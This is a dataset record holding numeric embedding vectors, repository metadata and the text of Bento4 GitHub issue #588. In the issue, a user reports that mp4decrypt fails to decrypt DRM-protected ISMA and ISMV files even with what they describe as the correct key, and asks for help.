0.02428792603313923, 0.002604709705337882, 0.011107374913990498, 0.020111309364438057, -0.005814725998789072, 0.0045662811025977135, 0.006571359466761351, -0.004993779119104147, -0.00823973584920168, 0.00019920733757317066, 0.009215792641043663, 0.013248647563159466, 0.007479318883270025, 0.018779635429382324, -0.011591620743274689, 0.007691176608204842, -0.002580119064077735, -0.023970140144228935, 0.008436460047960281, 0.011742946691811085, 0.021397586911916733, -0.005152672063559294, -0.009669772349298, 0.006582708563655615, -0.01229528896510601, -0.0037793826777487993, 0.004672209732234478, -0.004895416554063559, -0.0021526215132325888, 0.0020353433210402727, 0.005285082850605249, 0.005364529322832823, 0.0020693917758762836, -0.0059168715961277485, -0.004123650956898928, -0.00919309351593256, 0.00727502815425396, -0.02210882119834423, 0.010070787742733955, -0.0034351146314293146, 0.0010063220979645848, 0.02123112790286541, -0.005220768973231316, 0.004316592123359442, 0.0035013200249522924, 0.031324613839387894, -0.03256549313664436, -0.012847631238400936, 0.008209469728171825, -0.012159095145761967, 0.01119817141443491, -0.010441537946462631, -0.01853751391172409, 0.005069442559033632, 0.01634327694773674, 0.01582876592874527, 0.01463328581303358, 0.006283838767558336, -0.002638758160173893, 0.0060114506632089615, 0.01035830844193697, -0.00014399676001630723, 0.011614319868385792, -0.014830010943114758, -0.002542287576943636, -0.02058042213320732, 0.015995224937796593, -0.006821047980338335, -0.012280156835913658, -0.01083498727530241, 0.0057995934039354324, -0.021866699680685997, 0.009624374099075794, 0.0016749966889619827, -0.011879141442477703, -0.007630645763128996, 0.0009122159099206328, 0.005368312355130911, -0.024605711922049522, 0.004615462385118008, -0.027238795533776283, 0.007411221973598003, 0.014050678350031376, -0.015934694558382034, 0.0006294242339208722, -0.005935787223279476, 0.0014347656397148967, -0.03329186141490936, 0.014065811410546303, 0.03320106491446495, -0.024696506559848785, -0.013982580974698067, -0.009669772349298, 0.01999024860560894, 0.015034301206469536, 0.027632243931293488, 0.0008658721344545484, -0.009140129201114178, 0.005058092996478081, 0.007676043547689915, 0.007952215149998665, 0.02348589338362217, -0.0012143963249400258, 0.008224602788686752, 0.027707908302545547, -0.006060631945729256, -0.013248647563159466, -0.019279014319181442, -0.011326799169182777, -0.0024987810757011175, -0.025226149708032608, 0.0074377041310071945, 0.000025565926989656873, 0.016373543068766594, -0.01737229712307453, -0.02917577512562275, -0.005235901568084955, -0.00685509666800499, 0.0073204259388148785, -0.01684265397489071, -0.005391011480242014, 0.0000809833945822902, 0.007471752818673849, -0.013362142257392406, 0.016948582604527473, 0.001276818453334272, 0.0011179255088791251, -0.005459108389914036, -0.0014290909748524427, -0.02121599391102791, 0.018643442541360855, 0.0003802081919275224, 0.0022207184229046106, 0.030885767191648483, -0.0013761266600340605, 0.004672209732234478, -0.016313010826706886, -0.0022547668777406216, 0.0032818964682519436, -0.0018026785692200065, 0.013581565581262112, 0.004664643667638302, 0.011364630423486233, -0.007524717133492231, 0.025150487199425697, -0.006533527746796608, -0.009072031825780869, 0.0034937537275254726, -0.009427649900317192, -0.007282594684511423, -0.00850455742329359, 0.013581565581262112, 0.005542337894439697, 0.01641893945634365, 0.013997714035212994, -0.017478227615356445, -0.0010214548092335463, 0.002604709705337882, 0.006998857017606497, -0.011447859928011894, -0.016751859337091446, -0.000484245247207582, -0.010267511941492558, 0.020958740264177322, 0.009616808034479618, -0.012386085465550423, -0.036076270043849945, 0.01196993701159954, 0.008398628793656826, -0.02029290236532688, -0.008602919057011604, 0.0014943504938855767, -0.003788840724155307, -0.000219068955630064, 0.01229528896510601, -0.0024666241370141506, -0.015798501670360565, -0.008209469728171825, 0.013452937826514244, -0.0040517705492675304, 0.004937031771987677, 0.0057087973691523075, -0.030401522293686867, -0.009473047219216824, 0.008542388677597046, -0.0052169859409332275, -0.008587786927819252, -0.0010356416460126638, -0.0000721757096471265, 0.004297676496207714, -0.008731546811759472, 0.00485001876950264, -0.015510980039834976, 0.012703871354460716, -0.007778189145028591, 0.013475636951625347, 0.012310422025620937, -0.015094832517206669, 0.0031948836985975504, 0.0023134059738367796, 0.0019445472862571478, 0.017236104235053062, 0.016766991466283798, -0.009442782029509544, 0.003421873552724719, -0.01433819904923439, 0.006056848913431168, -0.0042863269336521626, -0.012764401733875275, -0.014595454558730125, 0.017478227615356445, -0.00749823497608304, 0.011811044067144394, -0.0024647326208651066, -0.0269966721534729, 0.013573999516665936, -0.03108249232172966, 0.019748127087950706, -0.007301510311663151, 0.010660961270332336, -0.010933349840342999, 0.001213450450450182, 0.023591822013258934, -0.00514510553330183, -0.016176817938685417, 0.02678481489419937, -0.01765981875360012, -0.009003935381770134, 0.020232371985912323, 0.005644483491778374, -0.0080203115940094, 0.0003565633960533887, -0.008436460047960281, -0.0007509584538638592, 0.0019133362220600247, 0.023455629125237465, 0.007641995325684547, -0.014217137359082699, -0.0024382504634559155, -0.0024136598221957684, 0.00916282832622528, 0.014277668669819832, -0.00242500938475132, 0.014928372576832771, 0.014285234734416008, -0.00625357311218977, 0.012779534794390202, 0.008330531418323517, 0.007494451943784952, -0.002538504311814904, -0.025922253727912903, -0.01750849187374115, 0.016176817938685417, -0.00598496850579977, 0.015510980039834976, -0.0011727814562618732, 0.0018272692104801536, -0.01002538949251175, 0.011387329548597336, -0.020550157874822617, 0.0046797762624919415, 0.019097421318292618, -0.004971079993993044, -0.00937468558549881, -0.004301459528505802, -0.010101052932441235, 0.015601776540279388, 0.0032875712495297194, 0.00685509666800499, -0.007116135209798813, -0.017311766743659973, -0.006351935677230358, 0.009109864011406898, -0.011659717187285423, -0.004887850489467382, -0.01182617712765932, -0.025150487199425697, -0.011183038353919983, -0.008383495733141899, 0.007502018008381128, -0.0013912592548877, -0.005126189906150103, 0.016010358929634094, -0.006291404832154512, -0.002856290200725198, 0.017251236364245415, -0.006817264948040247, -0.005542337894439697, 0.007418788503855467, 0.012484448030591011, -0.025211017578840256, 0.02487809956073761, -0.00919309351593256, 0.0013515360187739134, 0.00026434872415848076, -0.0010744191240519285, -0.005530988797545433, 0.005512072704732418, 0.010494502261281013, -0.021700240671634674, 0.023334568366408348, -0.013944749720394611, 0.005527205299586058, -0.007256112527102232, 0.007641995325684547, -0.008232168853282928, -0.01538991928100586, -0.009692471474409103, -0.01035830844193697, -0.004483051598072052, 0.016449205577373505, -0.0048916335217654705, 0.014898107387125492, -0.010191849432885647, -0.009457915090024471, -0.00004761468881042674, 0.003603465622290969, -0.007997612468898296, -0.002661457285284996, -0.00849699042737484, -0.002757927868515253, -0.005852557718753815, -0.008875307627022266, 0.00634815264493227, 0.00465329410508275, 0.02291085384786129, 0.01163701806217432, -0.005844991188496351, -0.01436846423894167, 0.00399502320215106, 0.0074339210987091064, -0.00344835571013391, -0.03444194421172142, -0.01349833607673645, -0.008867740631103516, 0.007861418649554253, -0.003537260228767991, 0.007638211827725172, -0.027450652793049812, -0.017644686624407768, -0.007214497309178114, -0.008103541098535061, 0.013452937826514244, 0.01554124616086483, -0.006582708563655615, 0.015586643479764462, 0.036288127303123474, 0.010267511941492558, 0.011932105757296085, -0.014686250127851963, -0.0051980698481202126, 0.004350640811026096, -0.008580219931900501, -0.033231329172849655, -0.01374802552163601, 0.008088408969342709, 0.010797156020998955, -0.006968591827899218, 0.02415173128247261, -0.013074621558189392, 0.00459654675796628, -0.022275280207395554, -0.024015536531805992, 0.0029584357980638742, 0.020474493503570557, -0.011682416312396526, 0.013687494210898876, 0.012370952405035496, 0.016615664586424828, 0.001845239195972681, -0.013309177942574024, -0.0023720450699329376, 0.010630696080625057, 0.01691831834614277, 0.02400040440261364, 0.015889296308159828, -0.01131166610866785, 0.005432626232504845, -0.010085920803248882, -0.01670646108686924, 0.023909607902169228, 0.010244813747704029, 0.03347345069050789, 0.014217137359082699, 0.01735716499388218, 0.0022509838454425335, 0.002756036352366209, -0.0020107526797801256, 0.016978848725557327, 0.007524717133492231, -0.005701231304556131, 0.014073377475142479, 0.002205585828050971, 0.001819702796638012, -0.010812288150191307, -0.0033121618907898664, -0.004108518362045288, -0.0034426809288561344, 0.007494451943784952, -0.007823587395250797, -0.015510980039834976, 0.030840368941426277, 0.022139087319374084, 0.0009287672583013773, -0.0050089117139577866, 0.022441741079092026, 0.007369607221335173, -0.024121467024087906, 0.007732791360467672, 0.018855299800634384, -0.003412415739148855, -0.0021261393558233976, 0.004445219878107309, -0.010433971881866455, 0.029433030635118484, -0.0009779484244063497, -0.01316541712731123, 0.008595352992415428, -0.003930709324777126, 0.009056899696588516, 0.008156505413353443, -0.0036696710158139467, -0.009760567918419838, -0.017160439863801003, 0.007445270661264658, 0.004108518362045288, 0.003331077517941594, -0.022229883819818497, -0.009427649900317192, -0.02197262831032276, 0.012257457710802555, -0.005281299818307161, -0.0011633235262706876, -0.027374988421797752, -0.003807756584137678, 0.00525481766089797, -0.0069421096704900265, -0.009896761737763882, 0.005807159934192896, -0.0013855844736099243, -0.0037642500828951597, -0.015722837299108505, -0.005633133929222822, -0.006488129496574402, -0.005776894278824329, -0.012121263891458511, 0.019233616068959236, -0.0023115144576877356, -0.008391061797738075, -0.03150620684027672, -0.007222063839435577, -0.006836181040853262, 0.02480243518948555, -0.0025233717169612646, -0.011879141442477703, 0.01918821781873703, -0.006170343607664108, 0.005935787223279476, -0.0034672715701162815, 0.006060631945729256, -0.0029697853606194258, 0.00955627765506506, -0.004184181336313486, -0.013452937826514244, -0.011992636136710644, -0.023894475772976875, 0.0056142183020710945, 0.007577681448310614, 0.003181642619892955, 0.006964808329939842, -0.003276221686974168, 0.019021758809685707, -0.006510828621685505, -0.011947237886488438, -0.00904176663607359, 0.019869187846779823, 0.013331877067685127, 0.007452836725860834, -0.012741702608764172, -0.01575310342013836, 0.00864831730723381, 0.025044558569788933, 0.008572653867304325, 0.007157749962061644, 0.00733177550137043, -0.006438948679715395, -0.00660162465646863, -0.014406295493245125, -0.00020239937293808907, -0.022441741079092026, 0.012030467391014099, 0.01436846423894167, -0.010449104011058807, -0.018219728022813797, -0.00016657751984894276, 0.012613074854016304, -0.0031665097922086716, -0.008489424362778664, -0.0229865163564682, 0.024635976180434227, 0.003351885126903653, -0.0024079850409179926, 0.0021450549829751253, 0.018280258402228355, 0.017190705984830856, -0.0118564423173666, 0.0004031436110381037, 0.011508391238749027, 0.011750513687729836, 0.03604600578546524, -0.013967448845505714, 0.00441495468840003, -0.009957293048501015, -0.014777046628296375, 0.01382368803024292, -0.02275952696800232, -0.00849699042737484, 0.00534183019772172, -0.0160557571798563, 0.010744191706180573, 0.001789437490515411, 0.03413929045200348, 0.020323166623711586, 0.015004036016762257, 0.004884067457169294, 0.016751859337091446, 0.019097421318292618, 0.022214749827980995, 0.010131318122148514, 0.016207082197070122, 0.007755490019917488, -0.0015510980738326907, -0.003332969266921282, -0.012265023775398731, 0.0037112857680767775, 0.05523422360420227, -0.016751859337091446, 0.007365824189037085, 0.0200507789850235, -0.017099909484386444, -0.0019596798811107874, 0.004713824950158596, -0.008489424362778664, -0.02474190481007099, -0.0009136346052400768, -0.003522127401083708, 0.023304302245378494, 0.00817163847386837, -0.01735716499388218, 0.009904328733682632, -0.001877396134659648, 0.013120019808411598, 0.014625719748437405, -0.035924945026636124, -0.013604264706373215, 0.008428893983364105, 0.002241525799036026, 0.011576487682759762, -0.009442782029509544, -0.005375878885388374, -0.007297727279365063, -0.0045851971954107285, -0.026936141774058342, 0.01619195006787777, -0.02539261057972908, 0.008043010719120502, -0.007721441797912121, 0.012764401733875275, -0.006174126639962196, 0.01233312115073204, -0.00038966609281487763, -0.009177960455417633, 0.012257457710802555, -0.013399973511695862, 0.0026576740201562643, -0.0014413861790671945, 0.006484346464276314, -0.00193414359819144, 0.01765981875360012, -0.0021450549829751253, 0.02428792603313923, 0.0063141039572656155, 0.009692471474409103, 0.013475636951625347, 0.002479865215718746, 0.016766991466283798, 0.007460403256118298, 0.010517201386392117, -0.00010864780051633716, 0.021473249420523643, 0.007116135209798813, -0.008746679872274399, -0.028404010459780693, 0.006143861450254917, -0.010706359520554543, -0.004933248274028301, -0.014830010943114758, -0.020822545513510704, -0.009578975848853588, -0.01254497841000557, -0.0026557825040072203, -0.01430036686360836, 0.021261392161250114, -0.0004059810016769916, 0.008330531418323517, 0.003722635330632329, -0.01941520720720291, 0.011183038353919983, 0.002058042213320732, -0.0022547668777406216, -0.015601776540279388, 0.014239836484193802, 0.006382200866937637, 0.015586643479764462, 0.018658574670553207, 0.003633730811998248, -0.007959781214594841, 0.0013118127826601267, -0.006915627513080835, -0.013619397766888142, 0.0031097624450922012, -0.021987760439515114, -0.0034578137565404177, -0.001302354852668941, 0.006090897135436535, -0.006136295385658741, 0.007959781214594841, -0.00689671142026782, -0.01903689093887806, 0.010388573631644249, -0.009563843719661236, 0.005182937253266573, -0.006688637193292379, 0.013051922433078289, 0.008852608501911163, 0.010797156020998955, 0.011758079752326012, -0.03123381733894348, 0.02121599391102791, -0.008413760922849178, 0.007051821332424879, -0.02327403612434864, -0.01374802552163601, -0.00916282832622528, 0.0019114445894956589, 0.006919410545378923, -0.005277516320347786, -0.014285234734416008, -0.006726468913257122, -0.00625357311218977, -0.01422470435500145, 0.009730302728712559, -0.0002728608378674835, 0.01178834494203329, -0.006843747105449438, 0.0015340738464146852, 0.0038550461176782846, 0.035924945026636124, 0.00036247458774596453, 0.022487139329314232, -0.01781114563345909, 0.005682315211743116, 0.010449104011058807, -0.009889195673167706, 0.02837374433875084, 0.015041868202388287, -0.007267461623996496, 0.023970140144228935, 0.009510879404842854, 0.009972425177693367, 0.03595520928502083, 0.01094848196953535, 0.029417898505926132, 0.019808657467365265, 0.025997916236519814, 0.008148939348757267, 0.042492520064115524, -0.0014811094151809812, 0.011727814562618732, -0.006798349320888519, 0.014898107387125492, 0.0009193093283101916, 0.00864831730723381, 0.0013373491819947958, -0.007929516024887562, 0.0027106383349746466, 0.026240039616823196, -0.003976107574999332, 0.004736523609608412, 0.004237145651131868, 0.010804722085595131, 0.002039126353338361, 0.012900595553219318, -0.003841805038973689, -0.0034691630862653255, 0.00889800675213337, 0.008035444654524326, 0.001815919647924602, 0.005489373579621315, -0.0018906372133642435, -0.002368261804804206, 0.010002690367400646, -0.012325555086135864, -0.007952215149998665, 0.0005244413623586297, -0.0001225982268806547, -0.0037339848931878805, -0.0011907514417544007, -0.009571409784257412, 0.026512427255511284, -0.0019577883649617434, 0.0160406231880188, 0.011425160802900791, 0.008572653867304325, 0.0022509838454425335, 0.0007481210632249713, 0.018628308549523354, -0.015367220155894756, 0.0012210168642923236, 0.04261358082294464, -0.019581666216254234, 0.0010696902172639966, -0.005050526466220617, 0.008822343312203884, 0.0006005776231177151, -0.012310422025620937, -0.0321115143597126, 0.005890389438718557, -0.0034597052726894617, -0.00224341731518507, 0.013301611877977848, 0.00028704770375043154, -0.003514561103656888, 0.03934492543339729, -0.0029281703755259514, 0.01280979998409748, -0.00707830348983407, 0.029160642996430397, -0.0017175573157146573 ]
76
null
null
null
null
null
null
null
null
null
[ "axiomatic-systems", "Bento4" ]
Hello, I have two files - isma (audio) and ismv (video) downloaded with YouTube. Both are DRM protected. I also have right decryption key. I have red "Dealing with ISMV and ISMA input files" so I used mp4fragment to fix lack of TFDTs. After fixing audio and video are playing with vlc, but they are obviously encrypted. Unfortunately decrypting it with mp4decrypt changes nothing. I'm 100% sure that decryption key is correct. I have some experience with decrypting dash files, so I know how to properly use mp4decrypt. There is probably something in procedure, that I'm missing or there is some issue with Bento4 and ism files. I've also tried to convert ism to dash (mp4dash.bat) and then merging parts binary with python, but there is no change. I still cannot properly decrypt neither audio or video. This method (binary merging and decrypting "native" mpd) works file with other (not ism) files so there is little chance that something is wrong on my side. Any help would be much appreciated. Best regards
ism/manifest can't decrypt audio or video
https://api.github.com/repos/axiomatic-systems/Bento4/issues/588/comments
4
2021-03-08T21:05:06
2021-04-20T10:49:42Z
https://github.com/axiomatic-systems/Bento4/issues/588
824,951,739
588
false
This is a GitHub Issue repo:Bento4 owner:axiomatic-systems Title : ism/manifest can't decrypt audio or video Issue date: --- start body --- Hello, I have two files - isma (audio) and ismv (video) downloaded with YouTube. Both are DRM protected. I also have right decryption key. I have red "Dealing with ISMV and ISMA input files" so I used mp4fragment to fix lack of TFDTs. After fixing audio and video are playing with vlc, but they are obviously encrypted. Unfortunately decrypting it with mp4decrypt changes nothing. I'm 100% sure that decryption key is correct. I have some experience with decrypting dash files, so I know how to properly use mp4decrypt. There is probably something in procedure, that I'm missing or there is some issue with Bento4 and ism files. I've also tried to convert ism to dash (mp4dash.bat) and then merging parts binary with python, but there is no change. I still cannot properly decrypt neither audio or video. This method (binary merging and decrypting "native" mpd) works file with other (not ism) files so there is little chance that something is wrong on my side. Any help would be much appreciated. Best regards --- end body ---
1,184
[ -0.013727029785513878, 0.0201539546251297, -0.01517446432262659, -0.011492946185171604, -0.02885429561138153, -0.024386128410696983, -0.02556610107421875, 0.0343293733894825, -0.025770630687475204, 0.06434790790081024, 0.01865932159125805, -0.0025723432190716267, -0.025408772751688957, 0.004594031721353531, -0.0023914137855172157, 0.015489124692976475, -0.0021377194207161665, 0.002037421567365527, -0.029027357697486877, -0.01612631045281887, 0.004822160117328167, -0.001846659230068326, 0.02597515843808651, 0.003754283767193556, -0.0018014268716797233, 0.030773719772696495, -0.030726520344614983, 0.01524526346474886, -0.02298589237034321, -0.01524526346474886, 0.012098666280508041, 0.008912736549973488, -0.012562789022922516, 0.004125975538045168, 0.0328504741191864, 0.03192222863435745, -0.00012039421562803909, 0.05358655005693436, -0.012326794676482677, 0.012476257979869843, -0.0205315463244915, -0.026195421814918518, -0.008849804289638996, 0.02303309179842472, -0.026399949565529823, 0.02724953182041645, -0.015732984989881516, -0.02205764502286911, -0.02488958276808262, 0.0051918854005634785, 0.0015260996297001839, -0.022152043879032135, -0.03945832699537277, -0.019917959347367287, 0.014623810537159443, -0.030805185437202454, 0.021711520850658417, -0.005203684791922569, -0.003357025794684887, -0.011870537884533405, -0.02243523672223091, -0.01058043260127306, 0.009691518731415272, 0.04452434927225113, -0.0007935324683785439, 0.008369948714971542, -0.01776253990828991, 0.01683429442346096, -0.041031625121831894, 0.04650670662522316, 0.005007022526115179, 0.005805471912026405, 0.026667410507798195, -0.003402258036658168, 0.012672919780015945, -0.0496533028781414, 0.037381574511528015, 0.018596388399600983, 0.00576613936573267, 0.031214242801070213, -0.05695340782403946, 0.0025133443996310234, -0.03332246467471123, 0.0021121532190591097, 0.025424504652619362, 0.007858626544475555, -0.0854615792632103, -0.07514073699712753, -0.0240714680403471, -0.032756075263023376, 0.010714163072407246, -0.009376859292387962, 0.024795185774564743, -0.018800918012857437, 0.01735348254442215, 0.029200421646237373, -0.011469346471130848, -0.010706297121942043, -0.07300105690956116, -0.056040894240140915, -0.027815919369459152, -0.02429172955453396, -0.013609032146632671, -0.006875314749777317, 0.017778273671865463, -0.003254761453717947, 0.025597568601369858, -0.01181547250598669, 0.022797096520662308, 0.10390063375234604, 0.010446702130138874, 0.003414057893678546, 0.032976336777210236, -0.007760295178741217, -0.008448612876236439, 0.0119413360953331, -0.011335615999996662, -0.04408382624387741, -0.007665897253900766, -0.0031485636718571186, -0.0007217507227323949, -0.02709220163524151, -0.022230708971619606, 0.027721520513296127, -0.03722424432635307, 0.06891047954559326, -0.05289429798722267, 0.016928693279623985, 0.008841938339173794, -0.030584923923015594, -0.052988696843385696, -0.007799627725034952, -0.005164352711290121, 0.0025172776076942682, 0.02679327502846718, 0.011076021939516068, -0.03351125866174698, 0.04386356472969055, -0.012665053829550743, 0.022624032571911812, -0.020909138023853302, -0.02168005332350731, 0.022073378786444664, 0.024511991068720818, -0.03942686319351196, -0.013270772993564606, 0.02608529105782509, 0.013632631860673428, -0.02586502768099308, 0.039584193378686905, -0.007866492494940758, -0.006509522907435894, -0.003063998883590102, 0.00372281763702631, 0.048835188150405884, 0.02422879822552204, -0.008181152865290642, 0.017337750643491745, 0.012963980436325073, 0.009203796274960041, 0.009298194199800491, -0.024197332561016083, 0.04858345910906792, 0.004444568417966366, -0.0051918854005634785, -0.03766476735472679, -0.016818562522530556, -0.006242061965167522, 0.009313927963376045, 0.030616389587521553, -0.02086193859577179, -0.0018427259055897593, -0.010887226089835167, -0.03429790958762169, -0.02232510596513748, -0.04990503191947937, 0.003642186289653182, -0.005136820022016764, -0.0477653443813324, -0.028114845976233482, -0.04625497758388519, 0.016362305730581284, 0.01683429442346096, 0.012090799398720264, 0.0060611325316131115, -0.014466480351984501, 0.051635660231113434, -0.0615789070725441, 0.02235657349228859, -0.011980668641626835, 0.015489124692976475, 0.04770241305232048, 0.004377703182399273, 0.00947912409901619, 0.02474798634648323, 0.017589477822184563, -0.023678142577409744, -0.044178225100040436, -0.00830701645463705, -0.003532055299729109, 0.011154687032103539, -0.026746075600385666, 0.018863849341869354, -0.02202617935836315, -0.017086021602153778, 0.031890761107206345, -0.01694442518055439, 0.042573459446430206, 0.038608748465776443, -0.011752540245652199, -0.03832555189728737, -0.03527335450053215, 0.004424902144819498, 0.03634319826960564, 0.012137998826801777, -0.0026942738331854343, -0.05808618292212486, -0.018800918012857437, -0.017982803285121918, 0.026179688051342964, -0.0032272287644445896, -0.031214242801070213, 0.017086021602153778, -0.013388770632445812, -0.015009268186986446, -0.017605211585760117, 0.004086642991751432, 0.0016008312813937664, 0.017007358372211456, -0.008999267593026161, 0.0582120455801487, 0.039017803966999054, -0.02899589203298092, -0.01448221318423748, 0.003947012592107058, -0.016897225752472878, 0.020767541602253914, 0.00110327557194978, -0.008220485411584377, -0.005066021345555782, -0.02399280294775963, -0.00195973995141685, -0.01903691329061985, -0.028932960703969002, -0.04949597269296646, 0.052390843629837036, -0.004621564410626888, 0.03266167640686035, -0.010714163072407246, 0.02094060368835926, 0.022152043879032135, -0.00822835136204958, 0.008959935046732426, 0.025802096351981163, -0.02732819691300392, 0.021444059908390045, 0.011839071288704872, 0.04222733527421951, -0.013105576857924461, -0.05594649538397789, 0.029137490317225456, 0.0066865189000964165, -0.014993535354733467, -0.019272906705737114, 0.02254536934196949, -0.01173680741339922, -0.025896495208144188, -0.004086642991751432, -0.0158667154610157, -0.04062256962060928, -0.007870426401495934, 0.01743214763700962, -0.021664321422576904, -0.00714670866727829, -0.02833510749042034, 0.0037090512923896313, 0.029798274859786034, 0.012326794676482677, 0.0164252370595932, -0.012208797037601471, 0.013734896667301655, 0.01985502801835537, 0.02056301198899746, 0.01479687262326479, 0.005420013330876827, -0.021491259336471558, 0.006214529275894165, 0.009361126460134983, -0.0690363422036171, 0.004731695633381605, 0.003868347965180874, 0.02131819538772106, -0.051446862518787384, -0.0046018981374800205, -0.009455524384975433, 0.0062774610705673695, 0.011807605624198914, -0.011681742034852505, 0.013097710907459259, 0.0029578013345599174, -0.049023982137441635, 0.01906837895512581, -0.032976336777210236, 0.004448501858860254, -0.039363931864500046, 0.018690787255764008, -0.0037267510779201984, 0.03612293675541878, -0.024496259167790413, -0.02078327350318432, 0.03263021260499954, -0.008456479758024216, -0.05556890368461609, 0.032756075263023376, -0.052642568945884705, 0.014977802522480488, 0.007205707486718893, -0.036406129598617554, -0.008448612876236439, 0.032756075263023376, 0.0009503706824034452, 0.021774452179670334, -0.04505927115678787, 0.01065909769386053, -0.009455524384975433, -0.04109456017613411, -0.03766476735472679, 0.005431813187897205, -0.03911220282316208, 0.007060177158564329, 0.03193796053528786, 0.005538010969758034, 0.033165134489536285, 0.017148954793810844, 0.024685055017471313, -0.02257683500647545, -0.022938692942261696, -0.03486429527401924, -0.016378037631511688, -0.0028889693785458803, 0.004006011411547661, -0.006906780879944563, 0.010045511648058891, -0.012602121569216251, -0.0017542279092594981, 0.008818338625133038, 0.013176375068724155, 0.009290328249335289, -0.00023267610231414437, 0.01006124448031187, 0.0010373936966061592, -0.014812606386840343, 0.009825249202549458, -0.009534189477562904, 0.006049333140254021, -0.05399560555815697, -0.011697474867105484, -0.018942514434456825, 0.05613529309630394, 0.021365394815802574, 0.006131931208074093, -0.03804235905408859, 0.01222452986985445, 0.04207000508904457, -0.008794738911092281, -0.004767094738781452, -0.032787542790174484, 0.03571387752890587, -0.006084732245653868, -0.0073119052685797215, 0.024275997653603554, 0.003848681692034006, -0.039206601679325104, 0.033574189990758896, -0.014718208461999893, -0.022041913121938705, -0.007209640461951494, 0.0006298110820353031, -0.048835188150405884, 0.03045905940234661, -0.033574189990758896, -0.008503679186105728, 0.036185868084430695, -0.0246378555893898, 0.00938472617417574, -0.018155865371227264, 0.028382306918501854, 0.025172777473926544, -0.01993369311094284, -0.01993369311094284, -0.015135131776332855, 0.005380681250244379, -0.012051466852426529, -0.031670499593019485, -0.0032665610779076815, 0.011028822511434555, -0.04408382624387741, -0.010344438254833221, -0.001985306153073907, -0.03335392847657204, 0.008425014093518257, -0.002177051967009902, 0.024464793503284454, -0.015260996297001839, -0.019430236890912056, 0.028083380311727524, 0.01338090468198061, -0.031591836363077164, 0.010092710144817829, -0.003868347965180874, -0.0053413487039506435, -0.009392592124640942, -0.017573745921254158, 0.017227619886398315, 0.008566610515117645, 0.021853117272257805, -0.015441925264894962, 0.04974770173430443, 0.012609988451004028, 0.036185868084430695, 0.011555877514183521, -0.02429172955453396, -0.016000445932149887, -0.013357304967939854, 0.019760629162192345, 0.02197898179292679, -0.016440970823168755, 0.004043377470225096, 0.05629262328147888, -0.01173680741339922, 0.019288640469312668, -0.011587344110012054, 0.0035438549239188433, -0.02183738350868225, -0.002755239140242338, 0.01183120533823967, -0.007449568714946508, -0.021097933873534203, -0.007071977015584707, 0.019839294254779816, -0.01366409845650196, 0.024354660883545876, -0.0006878264830447733, 0.01873798668384552, 0.00958925485610962, -0.03442377224564552, -0.025204243138432503, -0.046601101756095886, 0.010871493257582188, -0.018407592549920082, 0.021444059908390045, 0.045814454555511475, -0.0034376573748886585, -0.009604987688362598, -0.006529189180582762, -0.008881269954144955, -0.024606389924883842, 0.005919535644352436, 0.0070877098478376865, 0.028948694467544556, -0.025629034265875816, 0.026777541264891624, -0.0016126310219988227, 0.004334437660872936, 0.02553463540971279, 0.004472101107239723, -0.030317462980747223, -0.03527335450053215, 0.009660053066909313, 0.0002959767880383879, 0.00735123734921217, -0.015764452517032623, 0.05339775234460831, 0.012373993173241615, 0.004751361440867186, 0.02575489692389965, 0.02012248896062374, -0.04225879907608032, -0.000017730337276589125, -0.036217331886291504, -0.011839071288704872, -0.017982803285121918, 0.009408325888216496, 0.012130131945014, -0.008291283622384071, -0.03382591903209686, -0.00019850603712256998, 0.014057422988116741, -0.010777095332741737, 0.005156485829502344, -0.009117265231907368, -0.01312130969017744, 0.006887114606797695, -0.01675562933087349, 0.017180420458316803, 0.022230708971619606, -0.028130577877163887, 0.008299149572849274, 0.013546100817620754, 0.02665167860686779, 0.012389726005494595, -0.007504634093493223, 0.019902227446436882, -0.007764228619635105, 0.028209242969751358, -0.008401414379477501, -0.014600210823118687, 0.026824740692973137, -0.007449568714946508, -0.0015506823547184467, -0.0018781251274049282, -0.03075798787176609, 0.0001246347528649494, -0.009250995703041553, -0.028681233525276184, -0.03971005603671074, -0.02437039464712143, -0.0015949314692988992, 0.002755239140242338, -0.00004514014653977938, -0.009927514009177685, -0.005734673235565424, -0.0014887338038533926, 0.017935603857040405, 0.01407315582036972, 0.007123109418898821, 0.04836319759488106, -0.006973646115511656, -0.006556721869856119, 0.011587344110012054, -0.01963476650416851, -0.009502722881734371, 0.006344326306134462, 0.004157441668212414, 0.007815361022949219, 0.019697697833180428, -0.02138112671673298, -0.0041220420971512794, 0.0021888515911996365, 0.018800918012857437, -0.020704608410596848, 0.022608300670981407, -0.03543068468570709, 0.02328481897711754, -0.046192046254873276, -0.013373037800192833, 0.032347019761800766, -0.007909758947789669, 0.005911669228225946, -0.004995223134756088, 0.01562285516411066, 0.005050288513302803, 0.00016409011732321233, -0.0036166200879961252, 0.0022557168267667294, 0.021113667637109756, 0.03728717565536499, 0.031214242801070213, 0.015111532993614674, 0.005447546485811472, -0.02355227991938591, 0.010965891182422638, 0.01263358723372221, 0.008613809943199158, 0.013451702892780304, 0.00014270309475250542, 0.00724110659211874, 0.015158731490373611, -0.0376962348818779, -0.012491990812122822, -0.0063325269147753716, 0.004912624601274729, 0.023804007098078728, 0.013963025063276291, -0.0008417147328145802, 0.052611105144023895, 0.02515704371035099, 0.021365394815802574, 0.005073887761682272, -0.014474347233772278, 0.04968477040529251, -0.039395395666360855, -0.024165866896510124, 0.0032311619725078344, 0.007658030837774277, 0.013144909404218197, 0.01754227839410305, -0.01242905855178833, -0.013373037800192833, -0.017196154221892357, -0.034990161657333374, 0.004102375824004412, -0.006725851446390152, 0.0010373936966061592, 0.023394949734210968, -0.008071022108197212, 0.004845759365707636, -0.006403325125575066, 0.03565094619989395, 0.02333201840519905, -0.03606000170111656, 0.04229026660323143, 0.039615657180547714, 0.001861408818513155, -0.0040138778276741505, 0.004196773748844862, -0.016928693279623985, 0.009785916656255722, -0.029137490317225456, 0.018108665943145752, 0.016771363094449043, 0.0082126185297966, 0.035147491842508316, 0.0006209613056853414, 0.01716468669474125, 0.01854919083416462, 0.0244490597397089, 0.011634542606770992, -0.0009602037607692182, 0.019084110856056213, -0.0025231775362044573, -0.01765240915119648, 0.03335392847657204, -0.025581834837794304, 0.015017135068774223, 0.012767317704856396, 0.01291678100824356, 0.00987244863063097, 0.005121086724102497, -0.03182782977819443, -0.047230422496795654, 0.004043377470225096, -0.019084110856056213, -0.020437147468328476, 0.011500812135636806, -0.0034337241668254137, 0.007803560700267553, -0.041629478335380554, 0.009235262870788574, -0.01467100903391838, -0.002770972205325961, 0.0020905204582959414, -0.018612122163176537, 0.029027357697486877, -0.023457881063222885, 0.03483283147215843, -0.006525255739688873, -0.010698430240154266, 0.0009041550219990313, -0.012271728366613388, 